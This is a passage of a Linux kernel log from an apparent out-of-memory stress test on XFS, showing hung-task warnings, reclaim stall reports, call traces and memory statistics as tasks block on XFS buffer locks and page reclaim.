__filemap_fdatawrite_range+0xc1/0x100 [ 1201.339950] [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60 [ 1201.344676] [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs] [ 1201.349016] [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0 [ 1201.353378] [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90 [ 1201.357354] [<ffffffff811ff378>] do_fsync+0x38/0x60 [ 1201.360970] [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10 [ 1201.364887] [<ffffffff81003642>] do_syscall_64+0x62/0x190 [ 1201.368873] [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25 [ 1201.373458] 2 locks held by oom-torture/4083: [ 1201.377979] #0: (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0 [ 1201.384627] #1: (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs] [ 1201.392372] INFO: task oom-torture:4126 blocked for more than 120 seconds. [ 1201.397186] Not tainted 4.7.0-rc7+ #55 [ 1201.400361] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1201.405791] oom-torture D ffff880019c5f428 0 4126 3652 0x00000080 [ 1201.413798] ffff880019c5f428 ffff880019c58040 ffff88003fba4080 ffff880019c58040 [ 1201.419259] ffff880019c60000 ffff880037de7070 ffff880019c58040 ffff880035d00000 [ 1201.425238] 0000000000000000 ffff880019c5f440 ffffffff81621dea 7fffffffffffffff [ 1201.430688] Call Trace: [ 1201.432768] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1201.436438] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1201.440641] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1201.444792] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1201.449212] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1201.453883] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1201.457442] [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70 [ 1201.461940] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1201.465364] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1201.469653] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1201.474029] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1201.478766] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1201.483480] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1201.488382] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1201.492630] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1201.497546] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1201.502408] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1201.506862] [<ffffffff812dd76e>] ? 
__radix_tree_lookup+0x6e/0xd0 [ 1201.511693] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1201.516961] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1201.522213] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1201.526631] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1201.531094] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1201.536384] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1201.540818] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1201.545350] [<ffffffff81158326>] write_cache_pages+0x1f6/0x490 [ 1201.549613] [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs] [ 1201.554525] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1201.558776] [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs] [ 1201.563217] [<ffffffff811594ac>] do_writepages+0x1c/0x30 [ 1201.567127] [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100 [ 1201.571792] [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60 [ 1201.576518] [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs] [ 1201.580860] [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0 [ 1201.584875] [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90 [ 1201.588849] [<ffffffff811ff378>] do_fsync+0x38/0x60 [ 1201.592486] [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10 [ 1201.596086] [<ffffffff81003642>] do_syscall_64+0x62/0x190 [ 1201.600028] [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25 [ 1201.604598] 2 locks held by oom-torture/4126: [ 1201.609179] #0: (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0 [ 1201.618523] #1: (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 [xfs] [ 1201.678895] MemAlloc-Info: stalling=112 dying=3 exiting=3 victim=0 oom_count=3275 [ 1201.698443] MemAlloc: systemd(1) flags=0x400900 switches=158149 seq=5087 gfp=0x242134a(GFP_NOFS|__GFP_HIGHMEM|__GFP_COLD|__GFP_NOWARN|__GFP_NORETRY|__GFP_HARDWALL|__GFP_MOVABLE) order=0 delay=81975 uninterruptible [ 1201.735142] systemd D ffff88003faef5b8 0 1 0 0x00000000 [ 1201.743813] ffff88003faef5b8 00000001000dc1d3 ffff88002b3fc040 ffff88003fae8040 [ 1201.752998] ffff88003faf0000 ffff88003faef5f0 ffff88003d650300 00000001000dc1d3 [ 1201.761073] 0000000000000002 ffff88003faef5d0 ffffffff81621dea ffff88003d650300 [ 1201.766466] Call Trace: [ 1201.768534] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1201.772339] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1201.776623] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1201.780802] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1201.785651] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1201.790259] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1201.794385] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1201.798338] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1201.803098] [<ffffffff8100301a>] ? trace_hardirqs_on_thunk+0x1a/0x1c [ 1201.807690] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1201.811922] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1201.815748] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1201.820144] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1201.824254] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1201.829014] [<ffffffff810c1a9b>] ? 
__lock_acquire+0x75b/0x1a30 [ 1201.833220] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1201.837477] [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160 [ 1201.841758] [<ffffffff81159d6e>] __do_page_cache_readahead+0x10e/0x370 [ 1201.846403] [<ffffffff81159dd0>] ? __do_page_cache_readahead+0x170/0x370 [ 1201.851167] [<ffffffff81149cb7>] ? pagecache_get_page+0x27/0x260 [ 1201.855494] [<ffffffff8114ce1b>] filemap_fault+0x31b/0x670 [ 1201.859509] [<ffffffffa0251d00>] ? xfs_ilock+0xd0/0xe0 [xfs] [ 1201.863631] [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs] [ 1201.868073] [<ffffffff81176e71>] __do_fault+0x71/0x140 [ 1201.871866] [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30 [ 1201.876068] [<ffffffff8105c865>] ? __do_page_fault+0x1b5/0x560 [ 1201.880291] [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560 [ 1201.884492] [<ffffffff8105c840>] __do_page_fault+0x190/0x560 [ 1201.888952] [<ffffffff8105cc40>] do_page_fault+0x30/0x80 [ 1201.893093] [<ffffffff81629278>] page_fault+0x28/0x30 [ 1201.896840] MemAlloc: kswapd0(56) flags=0xa60840 switches=69433 uninterruptible [ 1201.903736] kswapd0 D ffff880039fa7178 0 56 2 0x00000000 [ 1201.909494] ffff880039fa7178 0000000000000006 ffffffff81c0d540 ffff880039fa0100 [ 1201.915008] ffff880039fa8000 ffff880037de7070 ffff880039fa0100 ffff880035d00000 [ 1201.920524] 0000000000000000 ffff880039fa7190 ffffffff81621dea 7fffffffffffffff [ 1201.925986] Call Trace: [ 1201.928112] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1201.931838] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1201.936074] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1201.940535] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1201.944987] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1201.949644] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1201.953149] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1201.956682] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1201.960832] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1201.965200] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1201.969536] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1201.973892] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1201.978644] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1201.982842] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1201.987335] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1201.992105] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1201.996447] [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0 [ 1202.000745] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1202.005547] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1202.010018] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1202.014194] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1202.018597] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1202.023493] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1202.028006] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1202.032475] [<ffffffffa023d886>] xfs_vm_writepage+0x36/0x70 [xfs] [ 1202.036809] [<ffffffff8115e1df>] pageout.isra.43+0x18f/0x240 [ 1202.040867] [<ffffffff8115fa85>] shrink_page_list+0x725/0x950 [ 1202.045348] [<ffffffff811603a5>] shrink_inactive_list+0x205/0x490 [ 1202.049708] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1202.053893] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1202.057714] [<ffffffff81162165>] kswapd+0x445/0x830 [ 1202.061317] [<ffffffff81161d20>] ? 
mem_cgroup_shrink_node_zone+0xb0/0xb0 [ 1202.066285] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1202.069865] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1202.074064] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 (...snipped...) [ 1208.254571] MemAlloc: kworker/2:1(4484) flags=0x4208860 switches=41309 seq=15 gfp=0x2400000(GFP_NOIO) order=0 delay=90419 uninterruptible [ 1208.254573] kworker/2:1 D ffff88002d50b548 0 4484 2 0x00000080 [ 1208.254588] Workqueue: events_freezable_power_ disk_events_workfn [ 1208.254589] ffff88002d50b548 00000001000ddb5a ffff88003fb60080 ffff88002d5040c0 [ 1208.254591] ffff88002d50c000 ffff88002d50b580 ffff88003d690300 00000001000ddb5a [ 1208.254592] 0000000000000002 ffff88002d50b560 ffffffff81621dea ffff88003d690300 [ 1208.254592] Call Trace: [ 1208.254594] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1208.254595] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1208.254596] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1208.254597] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1208.254598] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1208.254600] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1208.254601] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1208.254602] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1208.254604] [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80 [ 1208.254605] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1208.254606] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1208.254607] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1208.254608] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1208.254609] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1208.254610] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1208.254613] [<ffffffff811a6029>] ? kmem_cache_alloc_node+0x99/0x1d0 [ 1208.254614] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1208.254617] [<ffffffff812a3b2d>] ? bio_alloc_bioset+0x20d/0x2d0 [ 1208.254618] [<ffffffff812a4f14>] bio_copy_kern+0xc4/0x180 [ 1208.254619] [<ffffffff812aff00>] blk_rq_map_kern+0x70/0x130 [ 1208.272701] [<ffffffff8140f2ad>] scsi_execute+0x12d/0x160 [ 1208.272734] [<ffffffff8140f3d4>] scsi_execute_req_flags+0x84/0xf0 [ 1208.272738] [<ffffffffa01e0762>] sr_check_events+0xb2/0x2a0 [sr_mod] [ 1208.272742] [<ffffffffa01d4163>] cdrom_check_events+0x13/0x30 [cdrom] [ 1208.272743] [<ffffffffa01e0ba5>] sr_block_check_events+0x25/0x30 [sr_mod] [ 1208.272747] [<ffffffff812bb6db>] disk_check_events+0x5b/0x150 [ 1208.272749] [<ffffffff812bb7e7>] disk_events_workfn+0x17/0x20 [ 1208.272752] [<ffffffff8108e2f5>] process_one_work+0x1a5/0x400 [ 1208.272753] [<ffffffff8108e291>] ? process_one_work+0x141/0x400 [ 1208.272755] [<ffffffff8108e676>] worker_thread+0x126/0x490 [ 1208.272756] [<ffffffff8108e550>] ? process_one_work+0x400/0x400 [ 1208.272758] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1208.272761] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1208.272762] [<ffffffff81094c80>] ? 
kthread_create_on_node+0x230/0x230 [ 1208.272858] Mem-Info: [ 1208.272864] active_anon:197951 inactive_anon:2919 isolated_anon:0 [ 1208.272864] active_file:497 inactive_file:551 isolated_file:23 [ 1208.272864] unevictable:0 dirty:0 writeback:204 unstable:0 [ 1208.272864] slab_reclaimable:1715 slab_unreclaimable:10861 [ 1208.272864] mapped:696 shmem:3239 pagetables:5438 bounce:0 [ 1208.272864] free:12363 free_pcp:219 free_cma:0 [ 1208.272869] Node 0 DMA free:4476kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:12kB inactive_file:20kB unevictable:0kB isolated(anon):0kB isolated(file):92kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:28kB mapped:12kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:756kB kernel_stack:432kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 1208.272870] lowmem_reserve[]: 0 936 936 936 [ 1208.272874] Node 0 DMA32 free:44976kB min:44320kB low:55400kB high:66480kB active_anon:783204kB inactive_anon:11676kB active_file:1976kB inactive_file:2184kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:788kB mapped:2772kB shmem:12948kB slab_reclaimable:6712kB slab_unreclaimable:42688kB kernel_stack:20384kB pagetables:21228kB unstable:0kB bounce:0kB free_pcp:876kB local_pcp:104kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 1208.272875] lowmem_reserve[]: 0 0 0 0 [ 1208.272883] Node 0 DMA: 37*4kB (U) 27*8kB (UM) 13*16kB (UM) 10*32kB (U) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4476kB [ 1208.272888] Node 0 DMA32: 1420*4kB (UME) 1010*8kB (UME) 661*16kB (UME) 323*32kB (UME) 117*64kB (UME) 22*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44976kB [ 1208.272890] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 1208.272892] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 1208.272893] 4329 total pagecache pages [ 1208.272894] 0 pages in swap cache [ 1208.272895] Swap cache stats: add 0, delete 0, find 0/0 [ 1208.272895] Free swap = 0kB [ 1208.272895] Total swap = 0kB [ 1208.272897] 262013 pages RAM [ 1208.272897] 0 pages HighMem/MovableOnly [ 1208.272898] 12770 pages reserved [ 1208.272898] 0 pages cma reserved [ 1208.272898] 0 pages hwpoisoned [ 1208.272899] Showing busy workqueues and worker pools: [ 1208.272972] workqueue events_power_efficient: flags=0x80 [ 1208.273012] pwq 0: cpus=0 node=0 flags=0x0 nice=0 active=1/256 [ 1208.273018] in-flight: 4340:fb_flashcursor [ 1208.273030] workqueue events_freezable_power_: flags=0x84 [ 1208.273058] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1208.273063] in-flight: 4484:disk_events_workfn [ 1208.273104] workqueue writeback: flags=0x4e [ 1208.273106] pwq 128: cpus=0-63 flags=0x4 nice=0 active=2/256 [ 1208.273111] in-flight: 73:wb_workfn wb_workfn [ 1208.306156] workqueue xfs-eofblocks/sda1: flags=0xc [ 1208.306191] pwq 4: cpus=2 node=0 flags=0x0 nice=0 active=1/256 [ 1208.306211] in-flight: 2125:xfs_eofblocks_worker [xfs] [ 1208.306229] pool 0: cpus=0 node=0 flags=0x0 nice=0 hung=0s workers=13 idle: 4426 2410 4325 4483 4437 4723 4326 2389 4721 4435 4720 2498 [ 1208.306236] pool 4: cpus=2 node=0 flags=0x0 nice=0 hung=0s workers=13 idle: 1882 2396 2156 4427 2483 2293 4718 4646 2516 4722 4719 [ 1208.306302] pool 128: cpus=0-63 flags=0x4 nice=0 hung=0s workers=3 idle: 
4706 6 (...snipped...) [ 1208.311522] MemAlloc-Info: stalling=112 dying=3 exiting=3 victim=0 oom_count=3275 (...snipped...) [ 1950.054919] MemAlloc-Info: stalling=114 dying=3 exiting=3 victim=0 oom_count=3275 [ 1950.078012] MemAlloc: systemd(1) flags=0x400900 switches=165614 seq=5087 gfp=0x242134a(GFP_NOFS|__GFP_HIGHMEM|__GFP_COLD|__GFP_NOWARN|__GFP_NORETRY|__GFP_HARDWALL|__GFP_MOVABLE) order=0 delay=830398 uninterruptible [ 1950.111605] systemd R running task 0 1 0 0x00000000 [ 1950.122076] ffff88003faef5b8 0000000100192d5b ffff88003a544100 ffff88003fae8040 [ 1950.128056] ffff88003faf0000 ffff88003faef5f0 ffff88003d6d0300 0000000100192d5b [ 1950.133668] 0000000000000002 ffff88003faef5d0 ffffffff81621dea ffff88003d6d0300 [ 1950.139115] Call Trace: [ 1950.141436] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1950.145228] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1950.149574] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1950.153772] [<ffffffff8112f24a>] ? __delayacct_blkio_start+0x1a/0x30 [ 1950.158432] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1950.162841] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1950.166950] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1950.170994] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1950.175841] [<ffffffff8100301a>] ? trace_hardirqs_on_thunk+0x1a/0x1c [ 1950.180556] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1950.185904] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1950.190358] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1950.194978] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1950.201233] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1950.206097] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1950.210494] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1950.215278] [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160 [ 1950.219628] [<ffffffff81159d6e>] __do_page_cache_readahead+0x10e/0x370 [ 1950.224302] [<ffffffff81159dd0>] ? __do_page_cache_readahead+0x170/0x370 [ 1950.229148] [<ffffffff81149cb7>] ? pagecache_get_page+0x27/0x260 [ 1950.233503] [<ffffffff8114ce1b>] filemap_fault+0x31b/0x670 [ 1950.237520] [<ffffffffa0251d00>] ? xfs_ilock+0xd0/0xe0 [xfs] [ 1950.241643] [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs] [ 1950.246027] [<ffffffff81176e71>] __do_fault+0x71/0x140 [ 1950.249784] [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30 [ 1950.253974] [<ffffffff8105c865>] ? __do_page_fault+0x1b5/0x560 [ 1950.259159] [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560 [ 1950.264641] [<ffffffff8105c840>] __do_page_fault+0x190/0x560 [ 1950.269192] [<ffffffff8105cc40>] do_page_fault+0x30/0x80 [ 1950.273736] [<ffffffff81629278>] page_fault+0x28/0x30 [ 1950.278475] MemAlloc: khugepaged(47) flags=0x200840 switches=8965 seq=9 gfp=0xc752ca(GFP_TRANSHUGE|__GFP_THISNODE|__GFP_DIRECT_RECLAIM|__GFP_OTHER_NODE) order=9 delay=762178 uninterruptible [ 1950.291797] khugepaged D ffff88003cf537a8 0 47 2 0x00000000 [ 1950.298253] ffff88003cf537a8 0000000100192dbf ffff88003fae8040 ffff88003cf3c000 [ 1950.304204] ffff88003cf54000 ffff88003cf537e0 ffff88003d6d0300 0000000100192dbf [ 1950.310046] 0000000000000002 ffff88003cf537c0 ffffffff81621dea ffff88003d6d0300 [ 1950.317795] Call Trace: [ 1950.320089] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1950.324003] [<ffffffff8162667e>] schedule_timeout+0x11e/0x1c0 [ 1950.328400] [<ffffffff810e4ba0>] ? init_timer_key+0x40/0x40 [ 1950.332449] [<ffffffff8112f24a>] ? 
__delayacct_blkio_start+0x1a/0x30 [ 1950.337038] [<ffffffff81621571>] io_schedule_timeout+0xa1/0x110 [ 1950.341332] [<ffffffff8116ba5d>] congestion_wait+0x7d/0xd0 [ 1950.345834] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1950.351326] [<ffffffff811605e1>] shrink_inactive_list+0x441/0x490 [ 1950.355756] [<ffffffff81174355>] ? __list_lru_count_one.isra.4+0x45/0x80 [ 1950.360660] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1950.366724] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1950.370594] [<ffffffff811617aa>] do_try_to_free_pages+0x17a/0x400 [ 1950.374968] [<ffffffff81161ac4>] try_to_free_pages+0x94/0xc0 [ 1950.379637] [<ffffffff81153c1c>] __alloc_pages_nodemask+0x69c/0xf70 [ 1950.384061] [<ffffffff810ba578>] ? remove_wait_queue+0x48/0x50 [ 1950.388185] [<ffffffff811af13e>] khugepaged+0x80e/0x1510 [ 1950.392291] [<ffffffff810baaa0>] ? wait_woken+0x80/0x80 [ 1950.396425] [<ffffffff811ae930>] ? vmf_insert_pfn_pmd+0x1b0/0x1b0 [ 1950.400908] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1950.404637] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1950.408407] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 [ 1950.412879] MemAlloc: kswapd0(56) flags=0xa60840 switches=69433 uninterruptible [ 1950.419403] kswapd0 D ffff880039fa7178 0 56 2 0x00000000 [ 1950.424425] ffff880039fa7178 0000000000000006 ffffffff81c0d540 ffff880039fa0100 [ 1950.430782] ffff880039fa8000 ffff880037de7070 ffff880039fa0100 ffff880035d00000 [ 1950.436007] 0000000000000000 ffff880039fa7190 ffffffff81621dea 7fffffffffffffff [ 1950.441198] Call Trace: [ 1950.443203] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1950.447880] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1950.452830] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1950.456988] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1950.461570] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1950.466355] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1950.469801] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1950.473158] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1950.477591] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1950.482185] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1950.486506] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1950.490796] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1950.495584] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1950.499804] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1950.504170] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1950.508832] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1950.513079] [<ffffffff812dd76e>] ? 
__radix_tree_lookup+0x6e/0xd0 [ 1950.517235] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1950.521686] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1950.526006] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1950.530096] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1950.534389] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1950.539174] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1950.543411] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1950.547712] [<ffffffffa023d886>] xfs_vm_writepage+0x36/0x70 [xfs] [ 1950.552184] [<ffffffff8115e1df>] pageout.isra.43+0x18f/0x240 [ 1950.556493] [<ffffffff8115fa85>] shrink_page_list+0x725/0x950 [ 1950.560540] [<ffffffff811603a5>] shrink_inactive_list+0x205/0x490 [ 1950.564864] [<ffffffff81160fad>] shrink_zone_memcg+0x5ad/0x740 [ 1950.569394] [<ffffffff81161214>] shrink_zone+0xd4/0x2f0 [ 1950.573071] [<ffffffff81162165>] kswapd+0x445/0x830 [ 1950.576627] [<ffffffff81161d20>] ? mem_cgroup_shrink_node_zone+0xb0/0xb0 [ 1950.581585] [<ffffffff81094d6e>] kthread+0xee/0x110 [ 1950.585080] [<ffffffff8162796f>] ret_from_fork+0x1f/0x40 [ 1950.588837] [<ffffffff81094c80>] ? kthread_create_on_node+0x230/0x230 (...snipped...) [ 1964.314371] MemAlloc: kworker/2:1(4484) flags=0x4208860 switches=48311 seq=15 gfp=0x2400000(GFP_NOIO) order=0 delay=838842 uninterruptible [ 1964.314373] kworker/2:1 D ffff88002d50b548 0 4484 2 0x00000080 [ 1964.314377] Workqueue: events_freezable_power_ disk_events_workfn [ 1964.314378] ffff88002d50b548 00000001001964d1 ffff88002a518100 ffff88002d5040c0 [ 1964.314379] ffff88002d50c000 ffff88002d50b580 ffff88003d690300 00000001001964d1 [ 1964.314380] 0000000000000002 ffff88002d50b560 ffffffff81621dea ffff88003d690300 [ 1964.314380] Call Trace: [ 1964.314382] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1964.314383] [<ffffffff8162667e>] 